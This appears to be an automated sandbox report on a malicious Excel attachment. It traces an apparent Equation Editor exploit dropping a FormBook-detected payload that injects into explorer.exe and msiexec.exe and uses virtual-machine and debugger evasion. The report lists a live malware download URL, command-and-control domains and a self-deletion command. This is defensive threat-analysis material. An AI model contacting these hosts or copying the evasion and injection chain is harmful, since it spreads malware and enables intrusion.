      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\Public\vbc.exe "C:\Users\Public\vbc.exe"
      Source: C:\Users\Public\vbc.exeProcess created: C:\Users\Public\vbc.exe "C:\Users\Public\vbc.exe"
      Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Users\Public\vbc.exe"
      Source: C:\Users\Public\vbc.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{1F486A52-3CB1-48FD-8F50-B8DC300D9F9D}\InProcServer32
      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\Desktop\~$Quotation Request - Alligator Pty Ltd.xlsxJump to behavior
      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Temp\CVRF131.tmpJump to behavior
      Source: classification engineClassification label: mal100.troj.expl.evad.winXLSX@9/24@4/4
      Source: C:\Users\Public\vbc.exeCode function: 4_2_00402012 CoCreateInstance,MultiByteToWideChar,
      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile read: C:\Users\desktop.iniJump to behavior
      Source: C:\Users\Public\vbc.exeCode function: 4_2_0040411B GetDlgItem,SetWindowTextA,SHBrowseForFolderA,CoTaskMemFree,lstrcmpiA,lstrcatA,SetDlgItemTextA,GetDiskFreeSpaceA,MulDiv,SetDlgItemTextA,
      Source: EXCEL.EXE, 00000000.00000002.687513423.0000000005120000.00000002.00020000.sdmp, explorer.exe, 00000006.00000000.528721020.0000000002AE0000.00000002.00020000.sdmpBinary or memory string: .VBPud<_
      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
      Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
      Source: Window RecorderWindow detected: More than 3 window changes detected
      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItems
      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll
      Source: Binary string: msiexec.pdb source: vbc.exe, 00000005.00000002.541236797.00000000002DA000.00000004.00000020.sdmp, vbc.exe, 00000005.00000002.541224912.00000000002C9000.00000004.00000020.sdmp, vbc.exe, 00000005.00000002.543131864.00000000025C0000.00000040.00020000.sdmp
      Source: Binary string: wntdll.pdb source: vbc.exe, vbc.exe, 00000005.00000003.481808621.00000000004A0000.00000004.00000001.sdmp, vbc.exe, 00000005.00000002.542128053.0000000000910000.00000040.00000001.sdmp, vbc.exe, 00000005.00000003.483202698.0000000000600000.00000004.00000001.sdmp, vbc.exe, 00000005.00000002.541453296.0000000000790000.00000040.00000001.sdmp, msiexec.exe
      Source: C:\Users\Public\vbc.exeCode function: 4_2_1001C365 push ecx; ret
      Source: C:\Users\Public\vbc.exeCode function: 5_2_0041B822 push eax; ret
      Source: C:\Users\Public\vbc.exeCode function: 5_2_0041B82B push eax; ret
      Source: C:\Users\Public\vbc.exeCode function: 5_2_0041B88C push eax; ret
      Source: C:\Users\Public\vbc.exeCode function: 5_2_0041B7D5 push eax; ret
      Source: C:\Users\Public\vbc.exeCode function: 5_2_007ADFA1 push ecx; ret
      Source: C:\Users\Public\vbc.exeCode function: 5_1_0041B822 push eax; ret
      Source: C:\Users\Public\vbc.exeCode function: 5_1_0041B82B push eax; ret
      Source: C:\Users\Public\vbc.exeCode function: 5_1_0041B88C push eax; ret
      Source: C:\Users\Public\vbc.exeCode function: 5_1_0041B7D5 push eax; ret
      Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_024FDFA1 push ecx; ret
      Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_000AB7D5 push eax; ret
      Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_000AB82B push eax; ret
      Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_000AB822 push eax; ret
      Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_000AB88C push eax; ret
      Source: C:\Users\Public\vbc.exeCode function: 4_2_00405C49 GetModuleHandleA,LoadLibraryA,GetProcAddress,
      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\winlogon[1].exeJump to dropped file
      Source: C:\Users\Public\vbc.exeFile created: C:\Users\user\AppData\Local\Temp\nspBFD8.tmp\uoqeqjqp.dllJump to dropped file
      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\Public\vbc.exeJump to dropped file
      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\Public\vbc.exeJump to dropped file

      Boot Survival:

      Drops PE files to the user root directory
      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | File created: C:\Users\Public\vbc.exe
      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | Process information set: NOOPENFILEERRORBOX
      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | Process information set: NOOPENFILEERRORBOX
      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | Process information set: NOOPENFILEERRORBOX
      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | Process information set: NOOPENFILEERRORBOX
      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | Process information set: NOOPENFILEERRORBOX
      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | Process information set: NOOPENFILEERRORBOX
      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | Process information set: NOOPENFILEERRORBOX
      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | Process information set: NOOPENFILEERRORBOX
      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | Process information set: NOOPENFILEERRORBOX
      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | Process information set: NOOPENFILEERRORBOX
      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | Process information set: NOOPENFILEERRORBOX
      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | Process information set: NOOPENFILEERRORBOX
      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | Process information set: NOOPENFILEERRORBOX
      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | Process information set: NOOPENFILEERRORBOX
      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | Process information set: NOOPENFILEERRORBOX
      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | Process information set: NOOPENFILEERRORBOX
      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | Process information set: NOOPENFILEERRORBOX
      Source: C:\Users\Public\vbc.exe | Process information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\msiexec.exe | Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX

      Malware Analysis System Evasion:

      Tries to detect virtualization through RDTSC time measurements
      Source: C:\Users\Public\vbc.exe | RDTSC instruction interceptor: First address: 0000000000408604 second address: 000000000040860A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
      Source: C:\Users\Public\vbc.exe | RDTSC instruction interceptor: First address: 000000000040899E second address: 00000000004089A4 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE TID: 1156 | Thread sleep time: -180000s >= -30000s
      Source: C:\Windows\explorer.exe | Last function: Thread delayed
      Source: C:\Windows\SysWOW64\msiexec.exe | Last function: Thread delayed
      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | Code function: 0_2_022166E8 rdtsc
      Source: C:\Users\Public\vbc.exe | Process information queried: ProcessInformation
      Source: C:\Users\Public\vbc.exe | Code function: 4_2_00405250 DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,DeleteFileA,FindNextFileA,FindClose,RemoveDirectoryA,
      Source: C:\Users\Public\vbc.exe | Code function: 4_2_00405C22 FindFirstFileA,FindClose,
      Source: C:\Users\Public\vbc.exe | Code function: 4_2_00402630 FindFirstFileA,
      Source: explorer.exe, 00000006.00000000.501680336.000000000456F000.00000004.00000001.sdmp | Binary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\5&22BE343F&0&000000
      Source: explorer.exe, 00000006.00000000.501680336.000000000456F000.00000004.00000001.sdmp | Binary or memory string: IDE\CDROMNECVMWAR_VMWARE_SATA_CD01_______________1.00____\6&373888B8&0&1.0.0
      Source: vbc.exe, 00000004.00000002.483703319.00000000008B4000.00000004.00000020.sdmp | Binary or memory string: \\?\IDE#CdRomNECVMWar_VMware_SATA_CD01_______________1.00____#6&373888b8&0&1.0.0#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{8a079453-cd11-11ea-a1d0-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{8a079453-cd11-11ea-a1d0-806e6f6e6963}#0000000006500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}]
      Source: explorer.exe, 00000006.00000000.527699949.000000000029B000.00000004.00000020.sdmp | Binary or memory string: IDE\CDROMNECVMWAR_VMWARE_SATA_CD01_______________1.00____\6&373888B8&0&1.0.0*N
      Source: explorer.exe, 00000006.00000000.493942706.00000000045D6000.00000004.00000001.sdmp | Binary or memory string: \\?\ide#cdromnecvmwar_vmware_sata_cd01_______________1.00____#6&373888b8&0&1.0.0#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
      Source: explorer.exe, 00000006.00000000.501732791.000000000457A000.00000004.00000001.sdmp | Binary or memory string: idechannel\5&12368b4a&0&7ide\cdromnecvmwar_vmware_sata_cd01_______________1.00____\6&373888b8&0&1.0.0acpi\pnp0a05\5cacpi\pnp0a05\25pciide\idech7
      Source: C:\Users\Public\vbc.exe | Code function: 4_2_1001AD6A EncodePointer,EncodePointer,___crtIsPackagedApp,LoadLibraryExW,GetLastError,LoadLibraryExW,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,IsDebuggerPresent,OutputDebugStringW,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,
      Source: C:\Users\Public\vbc.exe | Code function: 4_2_1001AD6A EncodePointer,EncodePointer,___crtIsPackagedApp,LoadLibraryExW,GetLastError,LoadLibraryExW,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,IsDebuggerPresent,OutputDebugStringW,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,
      Source: C:\Users\Public\vbc.exe | Code function: 4_2_00405C49 GetModuleHandleA,LoadLibraryA,GetProcAddress,
      Source: C:\Users\Public\vbc.exe | Code function: 4_2_10007CE0 SetEnhMetaFileBits,SetWinMetaFileBits,GetDC,CreateDIBitmap,ReleaseDC,GetProcessHeap,HeapFree,
      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | Code function: 0_2_022166E8 rdtsc
      Source: C:\Users\Public\vbc.exe | Process token adjusted: Debug
      Source: C:\Windows\SysWOW64\msiexec.exe | Process token adjusted: Debug
      Source: C:\Users\Public\vbc.exe | Code function: 4_2_0018EA3B mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\Public\vbc.exe | Code function: 4_2_0018EA7A mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\Public\vbc.exe | Code function: 4_2_0018EAB8 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\Public\vbc.exe | Code function: 4_2_0018E776 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\Public\vbc.exe | Code function: 4_2_0018E98A mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\Public\vbc.exe | Code function: 5_2_007B26F8 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 7_2_025026F8 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\Public\vbc.exe | Process queried: DebugPort
      Source: C:\Windows\SysWOW64\msiexec.exe | Process queried: DebugPort
      Source: C:\Users\Public\vbc.exe | Code function: 5_2_00409B40 LdrLoadDll,
      Source: C:\Users\Public\vbc.exe | Code function: 4_2_1001CB66 SetUnhandledExceptionFilter,UnhandledExceptionFilter,

      HIPS / PFW / Operating System Protection Evasion:

      System process connects to network (likely due to code injection or exploit)
      Source: C:\Windows\explorer.exe | Domain query: www.subsoilcorp.com
      Source: C:\Windows\explorer.exe | Domain query: www.travelgleam.com
      Source: C:\Windows\explorer.exe | Domain query: www.ll1ysq.biz
      Source: C:\Windows\explorer.exe | Network Connect: 162.210.195.97 80
      Sample uses process hollowing technique
      Source: C:\Users\Public\vbc.exe | Section unmapped: C:\Windows\SysWOW64\msiexec.exe base address: 610000
      Maps a DLL or memory area into another process
      Source: C:\Users\Public\vbc.exe | Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
      Source: C:\Users\Public\vbc.exe | Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
      Source: C:\Users\Public\vbc.exe | Section loaded: unknown target: C:\Windows\SysWOW64\msiexec.exe protection: execute and read and write
      Source: C:\Users\Public\vbc.exe | Section loaded: unknown target: C:\Windows\SysWOW64\msiexec.exe protection: execute and read and write
      Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: unknown target: C:\Windows\explorer.exe protection: read write
      Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
      Injects a PE file into a foreign processes
      Source: C:\Users\Public\vbc.exe | Memory written: C:\Users\Public\vbc.exe base: 400000 value starts with: 4D5A
      Queues an APC in another process (thread injection)
      Source: C:\Users\Public\vbc.exe | Thread APC queued: target process: C:\Windows\explorer.exe
      Modifies the context of a thread in another process (thread injection)
      Source: C:\Users\Public\vbc.exe | Thread register set: target process: 1764
      Source: C:\Users\Public\vbc.exe | Thread register set: target process: 1764
      Source: C:\Windows\SysWOW64\msiexec.exe | Thread register set: target process: 1764
      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | Process created: C:\Users\Public\vbc.exe "C:\Users\Public\vbc.exe"
      Source: C:\Users\Public\vbc.exe | Process created: C:\Users\Public\vbc.exe "C:\Users\Public\vbc.exe"
      Source: C:\Windows\SysWOW64\msiexec.exe | Process created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Users\Public\vbc.exe"
      Source: EXCEL.EXE, 00000000.00000002.683438687.00000000008A0000.00000002.00020000.sdmp, explorer.exe, 00000006.00000000.487912526.0000000000750000.00000002.00020000.sdmp | Binary or memory string: Shell_TrayWnd
      Source: EXCEL.EXE, 00000000.00000002.683438687.00000000008A0000.00000002.00020000.sdmp, explorer.exe, 00000006.00000000.487912526.0000000000750000.00000002.00020000.sdmp | Binary or memory string: !Progman
      Source: EXCEL.EXE, 00000000.00000002.683438687.00000000008A0000.00000002.00020000.sdmp, explorer.exe, 00000006.00000000.487912526.0000000000750000.00000002.00020000.sdmp | Binary or memory string: Program Manager<
      Source: C:\Users\Public\vbc.exe | Code function: 4_2_10019C0D cpuid
      Source: C:\Users\Public\vbc.exe | Code function: 4_2_0040594D GetVersion,GetSystemDirectoryA,GetWindowsDirectoryA,SHGetSpecialFolderLocation,SHGetPathFromIDListA,CoTaskMemFree,lstrcatA,lstrlenA,

      Stealing of Sensitive Information:

      Yara detected FormBook
      Source: Yara match | File source: 00000005.00000002.541290495.0000000000400000.00000040.00000001.sdmp, type: MEMORY
      Source: Yara match | File source: 00000007.00000002.683120830.00000000003C0000.00000004.00000001.sdmp, type: MEMORY
      Source: Yara match | File source: 00000005.00000001.481627227.0000000000400000.00000040.00020000.sdmp, type: MEMORY
      Source: Yara match | File source: 00000005.00000002.543081272.0000000002590000.00000040.00020000.sdmp, type: MEMORY
      Source: Yara match | File source: 00000006.00000000.512689943.00000000097D3000.00000040.00020000.sdmp, type: MEMORY
      Source: Yara match | File source: 00000007.00000002.682689101.00000000001E0000.00000040.00020000.sdmp, type: MEMORY
      Source: Yara match | File source: 00000006.00000000.505045943.00000000097D3000.00000040.00020000.sdmp, type: MEMORY
      Source: Yara match | File source: 00000005.00000000.480383682.0000000000400000.00000040.00000001.sdmp, type: MEMORY
      Source: Yara match | File source: 00000005.00000000.481156695.0000000000400000.00000040.00000001.sdmp, type: MEMORY
      Source: Yara match | File source: 00000007.00000002.682544135.0000000000090000.00000040.00020000.sdmp, type: MEMORY
      Source: Yara match | File source: 00000005.00000002.541124552.00000000001C0000.00000040.00020000.sdmp, type: MEMORY
      Source: Yara match | File source: 00000004.00000002.484497263.0000000001E90000.00000004.00000001.sdmp, type: MEMORY

      Remote Access Functionality:

      Yara detected FormBook
      Source: Yara match | File source: 00000005.00000002.541290495.0000000000400000.00000040.00000001.sdmp, type: MEMORY
      Source: Yara match | File source: 00000007.00000002.683120830.00000000003C0000.00000004.00000001.sdmp, type: MEMORY
      Source: Yara match | File source: 00000005.00000001.481627227.0000000000400000.00000040.00020000.sdmp, type: MEMORY
      Source: Yara match | File source: 00000005.00000002.543081272.0000000002590000.00000040.00020000.sdmp, type: MEMORY
      Source: Yara match | File source: 00000006.00000000.512689943.00000000097D3000.00000040.00020000.sdmp, type: MEMORY
      Source: Yara match | File source: 00000007.00000002.682689101.00000000001E0000.00000040.00020000.sdmp, type: MEMORY
      Source: Yara match | File source: 00000006.00000000.505045943.00000000097D3000.00000040.00020000.sdmp, type: MEMORY
      Source: Yara match | File source: 00000005.00000000.480383682.0000000000400000.00000040.00000001.sdmp, type: MEMORY
      Source: Yara match | File source: 00000005.00000000.481156695.0000000000400000.00000040.00000001.sdmp, type: MEMORY
      Source: Yara match | File source: 00000007.00000002.682544135.0000000000090000.00000040.00020000.sdmp, type: MEMORY
      Source: Yara match | File source: 00000005.00000002.541124552.00000000001C0000.00000040.00020000.sdmp, type: MEMORY
      Source: Yara match | File source: 00000004.00000002.484497263.0000000001E90000.00000004.00000001.sdmp, type: MEMORY

      Mitre Att&ck Matrix

      Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Exfiltration | Command and Control | Network Effects | Remote Service Effects | Impact
      Valid Accounts | Native API 1 | Path Interception | Process Injection 612 | Masquerading 111 | OS Credential Dumping | Security Software Discovery 151 | Remote Services | Archive Collected Data 1 | Exfiltration Over Other Network Medium | Encrypted Channel 1 | Eavesdrop on Insecure Network Communication | Remotely Track Device Without Authorization | System Shutdown/Reboot 1
      Default Accounts | Shared Modules 1 | Boot or Logon Initialization Scripts | Boot or Logon Initialization Scripts | Disable or Modify Tools 1 | LSASS Memory | Virtualization/Sandbox Evasion 2 | Remote Desktop Protocol | Clipboard Data 1 | Exfiltration Over Bluetooth | Ingress Tool Transfer 12 | Exploit SS7 to Redirect Phone Calls/SMS | Remotely Wipe Data Without Authorization | Device Lockout
      Domain Accounts | Exploitation for Client Execution 13 | Logon Script (Windows) | Logon Script (Windows) | Virtualization/Sandbox Evasion 2 | Security Account Manager | Process Discovery 2 | SMB/Windows Admin Shares | Data from Network Shared Drive | Automated Exfiltration | Non-Application Layer Protocol 2 | Exploit SS7 to Track Device Location | Obtain Device Cloud Backups | Delete Device Data
      Local Accounts | At (Windows) | Logon Script (Mac) | Logon Script (Mac) | Process Injection 612 | NTDS | Remote System Discovery 1 | Distributed Component Object Model | Input Capture | Scheduled Transfer | Application Layer Protocol 122 | SIM Card Swap | Carrier Billing Fraud | 
      Cloud Accounts | Cron | Network Logon Script | Network Logon Script | Deobfuscate/Decode Files or Information 1 | LSA Secrets | File and Directory Discovery 2 | SSH | Keylogging | Data Transfer Size Limits | Fallback Channels | Manipulate Device Communication | Manipulate App Store Rankings or Ratings | 
      Replication Through Removable Media | Launchd | Rc.common | Rc.common | Obfuscated Files or Information 3 | Cached Domain Credentials | System Information Discovery 114 | VNC | GUI Input Capture | Exfiltration Over C2 Channel | Multiband Communication | Jamming or Denial of Service | Abuse Accessibility Features | 
      External Remote Services | Scheduled Task | Startup Items | Startup Items | Software Packing 1 | DCSync | Network Sniffing | Windows Remote Management | Web Portal Capture | Exfiltration Over Alternative Protocol | Commonly Used Port | Rogue Wi-Fi Access Points | Data Encrypted for Impact | 

      Behavior Graph

      Behavior Graph ID: 532880 | Sample: Quotation Request - Alligat... | Startdate: 02/12/2021 | Architecture: WINDOWS | Score: 100

      Start
        DNS/IP: www.sdffzc.com; minisite.alibaba.com.gds.alibabadns.com; minisite.alibaba.com
        Signatures: Snort IDS alert for network traffic (e.g. based on Emerging Threat rules); Found malware configuration; Malicious sample detected (through community Yara rule); 11 other signatures
        -> EXCEL.EXE (33 29) started
             Dropped: ~$Quotation Reques...igator Pty Ltd.xlsx, data
        -> EQNEDT32.EXE (12) started
             DNS/IP: 107.173.191.75, 49165, 80 AS-COLOCROSSINGUS United States
             Dropped: C:\Users\user\AppData\...\winlogon[1].exe, PE32; C:\Users\Public\vbc.exe, PE32
             Signatures: Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)
             -> vbc.exe (17) started
                  Dropped: C:\Users\user\AppData\Local\...\uoqeqjqp.dll, PE32
                  Signatures: Tries to detect virtualization through RDTSC time measurements; Injects a PE file into a foreign processes
                  -> vbc.exe started
                       Signatures: Modifies the context of a thread in another process (thread injection); Maps a DLL or memory area into another process; Sample uses process hollowing technique; Queues an APC in another process (thread injection)
                       -> explorer.exe injected
                            DNS/IP: travelgleam.com 162.210.195.97, 49166, 80 LEASEWEB-USA-WDCUS United States; 192.168.2.22, 49165, 49166, 49168 unknown unknown; 4 other IPs or domains
                            Signatures: System process connects to network (likely due to code injection or exploit)
                            -> msiexec.exe started
                                 Signatures: Modifies the context of a thread in another process (thread injection); Maps a DLL or memory area into another process
                                 -> cmd.exe started


      Antivirus, Machine Learning and Genetic Malware Detection

      Initial Sample

      Source | Detection | Scanner | Label
      Quotation Request - Alligator Pty Ltd.xlsx | 31% | ReversingLabs | Document-Office.Exploit.CVE-2017-11882

      Dropped Files

      No Antivirus matches

      Unpacked PE Files

      Source | Detection | Scanner | Label
      7.2.msiexec.exe.29e796c.7.unpack | 100% | Avira | TR/Patched.Ren.Gen
      7.2.msiexec.exe.2a35f0.0.unpack | 100% | Avira | TR/Patched.Ren.Gen
      5.2.vbc.exe.400000.1.unpack | 100% | Avira | TR/Crypt.ZPACK.Gen
      5.2.vbc.exe.2dd780.0.unpack | 100% | Avira | HEUR/AGEN.1104764
      7.0.msiexec.exe.610000.0.unpack | 100% | Avira | HEUR/AGEN.1104764
      5.0.vbc.exe.400000.1.unpack | 100% | Avira | TR/Crypt.ZPACK.Gen
      5.0.vbc.exe.400000.0.unpack | 100% | Avira | TR/Patched.Ren.Gen2
      5.0.vbc.exe.400000.3.unpack | 100% | Avira | TR/Crypt.ZPACK.Gen
      7.2.msiexec.exe.610000.1.unpack | 100% | Avira | HEUR/AGEN.1104764
      4.2.vbc.exe.1e90000.1.unpack | 100% | Avira | TR/Crypt.ZPACK.Gen
      5.2.vbc.exe.25c0000.4.unpack | 100% | Avira | HEUR/AGEN.1104764
      5.0.vbc.exe.400000.2.unpack | 100% | Avira | TR/Crypt.ZPACK.Gen
      5.1.vbc.exe.400000.0.unpack | 100% | Avira | TR/Crypt.ZPACK.Gen

      Domains

      No Antivirus matches

      URLs

Source | Detection | Scanner | Label
http://www.icra.org/vocabulary/. | 0% | URL Reputation | safe
http://wellformedweb.org/CommentAPI/ | 0% | URL Reputation | safe
http://www.sdffzc.com/hf9j/?LnftM=Pqr9SePoNfnaC1kg2G0jCGwXX1ba57NV0gLvpt/5y4PrrRm7oBIm/XhJEBzYJkmjKkGOCg==&NnwLW=lTeXzRfHoPHDqpa | 0% | Avira URL Cloud | safe
http://www.iis.fhg.de/audioPA | 0% | URL Reputation | safe
http://107.173.191.75/dodge/winlogon.exe | 100% | Avira URL Cloud | malware
http://www.mozilla.com0 | 0% | URL Reputation | safe
http://computername/printers/printername/.printer | 0% | Avira URL Cloud | safe
http://www.%s.comPA | 0% | URL Reputation | safe
http://windowsmedia.com/redir/services.asp?WMPFriendly=true | 0% | URL Reputation | safe
www.dubaibiologicdentist.com/hf9j/ | 0% | Avira URL Cloud | safe
http://treyresearch.net | 0% | URL Reputation | safe
http://www.travelgleam.com/hf9j/?NnwLW=lTeXzRfHoPHDqpa&LnftM=Hi4i/MzZWraYpeia3tFw/razG0ol5F63XlO+NDDVDOKGXMifKzAuqwSCBSP91u5pGStR7A== | 0% | Avira URL Cloud | safe
http://servername/isapibackend.dll | 0% | Avira URL Cloud | safe

      Domains and IPs

      Contacted Domains

Name | IP | Active | Malicious | Antivirus Detection | Reputation
minisite.alibaba.com.gds.alibabadns.com | 47.246.136.142 | true | true | none | unknown
travelgleam.com | 162.210.195.97 | true | true | none | unknown
www.sdffzc.com | unknown | unknown | true | none | unknown
www.travelgleam.com | unknown | unknown | true | none | unknown
www.subsoilcorp.com | unknown | unknown | true | none | unknown
www.ll1ysq.biz | unknown | unknown | true | none | unknown

                  Contacted URLs

Name | Malicious | Antivirus Detection | Reputation
http://www.sdffzc.com/hf9j/?LnftM=Pqr9SePoNfnaC1kg2G0jCGwXX1ba57NV0gLvpt/5y4PrrRm7oBIm/XhJEBzYJkmjKkGOCg==&NnwLW=lTeXzRfHoPHDqpa | true | Avira URL Cloud: safe | unknown
http://107.173.191.75/dodge/winlogon.exe | true | Avira URL Cloud: malware | unknown
www.dubaibiologicdentist.com/hf9j/ | true | Avira URL Cloud: safe | low
http://www.travelgleam.com/hf9j/?NnwLW=lTeXzRfHoPHDqpa&LnftM=Hi4i/MzZWraYpeia3tFw/razG0ol5F63XlO+NDDVDOKGXMifKzAuqwSCBSP91u5pGStR7A== | true | Avira URL Cloud: safe | unknown

                  URLs from Memory and Binaries

Name | Source | Malicious | Antivirus Detection | Reputation
http://services.msn.com/svcs/oe/certpage.asp?name=%s&email=%s&&Check | EXCEL.EXE, 00000000.00000002.687693304.0000000005307000.00000002.00020000.sdmp, explorer.exe, 00000006.00000000.499463550.0000000002CC7000.00000002.00020000.sdmp | false | none | high
http://www.windows.com/pctv. | explorer.exe, 00000006.00000000.528721020.0000000002AE0000.00000002.00020000.sdmp | false | none | high
http://investor.msn.com | EXCEL.EXE, 00000000.00000002.687513423.0000000005120000.00000002.00020000.sdmp, explorer.exe, 00000006.00000000.528721020.0000000002AE0000.00000002.00020000.sdmp | false | none | high
http://www.msnbc.com/news/ticker.txt | EXCEL.EXE, 00000000.00000002.687513423.0000000005120000.00000002.00020000.sdmp, explorer.exe, 00000006.00000000.528721020.0000000002AE0000.00000002.00020000.sdmp | false | none | high
http://www.icra.org/vocabulary/. | EXCEL.EXE, 00000000.00000002.687693304.0000000005307000.00000002.00020000.sdmp, explorer.exe, 00000006.00000000.499463550.0000000002CC7000.00000002.00020000.sdmp | false | URL Reputation: safe | unknown
http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous. | vbc.exe, 00000004.00000002.484925855.0000000002360000.00000002.00020000.sdmp, explorer.exe, 00000006.00000000.497759823.0000000001BE0000.00000002.00020000.sdmp | false | none | high
http://wellformedweb.org/CommentAPI/ | explorer.exe, 00000006.00000000.531356125.0000000004650000.00000002.00020000.sdmp | false | URL Reputation: safe | unknown
http://nsis.sf.net/NSIS_Error | vbc.exe, vbc.exe, 00000004.00000000.473056040.0000000000409000.00000008.00020000.sdmp, vbc.exe, 00000004.00000002.482277603.0000000000409000.00000004.00020000.sdmp, vbc.exe, 00000005.00000000.477794884.0000000000409000.00000008.00020000.sdmp | false | none | high
http://www.piriform.com/ccleanerhttp://www.piriform.com/ccleanerv | explorer.exe, 00000006.00000000.495771332.0000000008414000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.504413647.0000000008374000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.501565204.0000000004513000.00000004.00000001.sdmp | false | none | high
http://investor.msn.com/ | EXCEL.EXE, 00000000.00000002.687513423.0000000005120000.00000002.00020000.sdmp, explorer.exe, 00000006.00000000.528721020.0000000002AE0000.00000002.00020000.sdmp | false | none | high
http://www.iis.fhg.de/audioPA | explorer.exe, 00000006.00000000.531356125.0000000004650000.00000002.00020000.sdmp | false | URL Reputation: safe | unknown
http://www.mozilla.com0 | explorer.exe, 00000006.00000000.493469713.0000000004399000.00000004.00000001.sdmp | false | URL Reputation: safe | unknown
http://www.piriform.com/ccleaner | explorer.exe, 00000006.00000000.495771332.0000000008414000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.504413647.0000000008374000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.501565204.0000000004513000.00000004.00000001.sdmp | false | none | high
